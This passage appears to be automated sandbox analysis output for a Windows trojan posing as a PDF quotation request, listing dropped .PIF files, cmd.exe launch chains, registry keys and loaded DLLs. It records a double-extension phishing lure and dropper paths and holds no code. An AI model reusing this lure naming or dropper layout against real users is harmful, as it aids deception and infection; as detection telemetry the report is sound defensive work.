                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_236BD80012_2_236BD800
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_236538E012_2_236538E0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2370FF0912_2_2370FF09
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23613FD212_2_23613FD2
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23613FD512_2_23613FD5
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2370FFB112_2_2370FFB1
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23651F9212_2_23651F92
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23659EB012_2_23659EB0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23707D7312_2_23707D73
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23653D4012_2_23653D40
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23701D5A12_2_23701D5A
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2366FDC012_2_2366FDC0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_236C9C3212_2_236C9C32
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2370FCF212_2_2370FCF2
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_1_0040156012_1_00401560
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_1_0040205812_1_00402058
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_1_004025B012_1_004025B0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_1_0040287012_1_00402870
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_1_004010E012_1_004010E0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_1_0040323012_1_00403230
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_1_004012C012_1_004012C0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_1_0040335012_1_00403350
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_1_0040155312_1_00401553
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_1_00401D6912_1_00401D69
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_1_00401D7012_1_00401D70
                      Source: Joe Sandbox View Dropped File: C:\Users\Public\Libraries\kmtqwssC.pif BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.0000000020824000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1395408495.00000000216C5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1395408495.0000000021696000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: classification engine Classification label: mal100.troj.evad.winEXE@21/7@2/2
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: 1_2_02957F5C GetDiskFreeSpaceA
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: 1_2_02966D50 CoCreateInstance
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe File created: C:\Users\Public\CsswqtmkF.cmd
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1484:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6604:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8168:120:WilError_03
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe ReversingLabs: Detection: 65%
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe File read: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                      Source: unknown Process created: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe "C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe"
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Process created: C:\Users\Public\Libraries\kmtqwssC.pif C:\Users\Public\Libraries\kmtqwssC.pif
                      Source: unknown Process created: C:\Users\Public\Libraries\Csswqtmk.PIF "C:\Users\Public\Libraries\Csswqtmk.PIF"
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Process created: C:\Users\Public\Libraries\kmtqwssC.pif C:\Users\Public\Libraries\kmtqwssC.pif
                      Source: unknown Process created: C:\Users\Public\Libraries\Csswqtmk.PIF "C:\Users\Public\Libraries\Csswqtmk.PIF"
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Process created: C:\Users\Public\Libraries\kmtqwssC.pif C:\Users\Public\Libraries\kmtqwssC.pif
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: apphelp.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: version.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: uxtheme.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: url.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: ieframe.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: iertutil.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: netapi32.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: userenv.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: winhttp.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: wkscli.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: netutils.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: amsi.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: smartscreenps.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: winmm.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: wininet.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: sspicli.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: wldp.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: profapi.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: mswsock.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: ieproxy.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: iphlpapi.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: winnsi.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: msasn1.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: mssip32.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: dnsapi.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: rasadhlp.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: fwpuclnt.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: winhttpcom.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: webio.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: schannel.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: mskeyprotect.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: ntasn1.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: ncrypt.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: ncryptsslp.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: cryptsp.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: rsaenh.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: gpapi.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: dpapi.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: ??????????.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: ??.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: sppc.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: ???.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section loaded: ??l.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ????.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: tquery.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: sppwmi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: sppcext.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: winscard.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif Section loaded: apphelp.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: apphelp.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: version.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: uxtheme.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: url.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: ieframe.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: iertutil.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: netapi32.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: userenv.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: winhttp.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: wkscli.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: netutils.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: amsi.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: smartscreenps.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: kernel.appcore.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: winmm.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: wininet.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: sspicli.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: windows.storage.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: wldp.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: profapi.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: ieproxy.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: mssip32.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: mswsock.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: iphlpapi.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: winnsi.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: ??????????.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: ??.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: ???.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: ??l.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: ?.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: ????.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: ???e???????????.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: tquery.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: cryptdll.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: spp.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: vssapi.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: vsstrace.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: endpointdlp.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: sppwmi.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: slc.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: sppcext.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: winscard.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: devobj.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: cryptsp.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: rsaenh.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ???e???????????.dllJump to behavior
